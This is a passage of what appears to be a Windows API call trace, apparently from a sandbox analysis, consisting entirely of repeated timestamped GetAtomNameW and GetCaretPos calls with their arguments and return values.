[0184.191] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.191] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.191] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.191] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.191] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.191] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.191] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.191] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.191] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.191] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.191] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.191] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.191] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.192] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.192] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.192] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.192] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.192] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.192] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.192] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.192] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.192] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.192] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.192] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.192] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.192] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.192] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.192] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.192] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.192] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.192] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.192] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.192] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.192] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.192] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.192] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.192] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.192] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.192] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.192] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.192] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.192] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.192] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.192] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.192] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.193] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.193] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.193] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.193] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.193] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.193] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.193] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.193] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.193] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.193] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.193] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.193] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.193] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.193] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.193] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.193] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.193] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.193] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.193] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.193] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.193] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.193] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.193] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.193] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.193] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.193] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.193] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.193] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.193] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.193] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.193] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.193] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.194] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.194] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.194] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.194] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.194] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.194] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.194] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.194] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.194] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.194] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.194] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.194] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.194] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.194] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.194] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.194] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.194] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.194] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.194] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.194] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.194] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.194] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.194] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.194] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.194] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.194] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.194] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.194] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.194] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.194] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.194] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.194] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.195] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.195] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.195] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.195] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.195] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.195] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.195] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.195] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.195] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.195] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.195] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.195] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.195] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.195] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.195] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.195] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.195] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.195] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.195] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.195] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.195] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.195] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.195] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.195] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.195] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.195] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.195] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.195] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.195] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.195] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.195] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.196] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.196] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.196] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.196] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.196] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.196] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.196] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.196] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.196] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.196] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.196] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.196] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.196] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.196] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.196] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.196] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.199] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.199] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.199] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.199] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.199] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.199] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.199] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.199] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.199] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.199] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.199] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.199] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.199] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.199] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.199] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.199] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.199] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.199] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.199] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.199] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.200] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.200] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.200] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.200] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.200] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.200] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.200] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.200] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.200] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.200] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.200] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.201] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.201] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.201] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.201] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.201] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.201] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.201] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.201] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.201] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.201] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.201] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.201] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.201] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.201] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.201] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.201] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.201] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.201] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.201] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.201] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.201] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.201] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.201] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.201] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.201] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.201] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.201] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.201] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.201] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.201] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.201] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.201] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.202] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.202] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.202] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.202] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.202] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.202] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.202] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.202] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.202] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.202] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.202] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.202] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.202] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.202] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.202] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.202] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.202] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.202] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.202] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.202] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.202] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.202] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.202] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.202] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.202] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.202] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.202] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.202] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.202] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.202] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.203] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.203] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.203] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.203] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.203] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.203] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.203] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.203] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.203] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.203] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.203] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.203] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0184.203] GetCaretPos (in: lpPoint=0x18ef80 | out: lpPoint=0x18ef80) returned 1 [0184.203] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 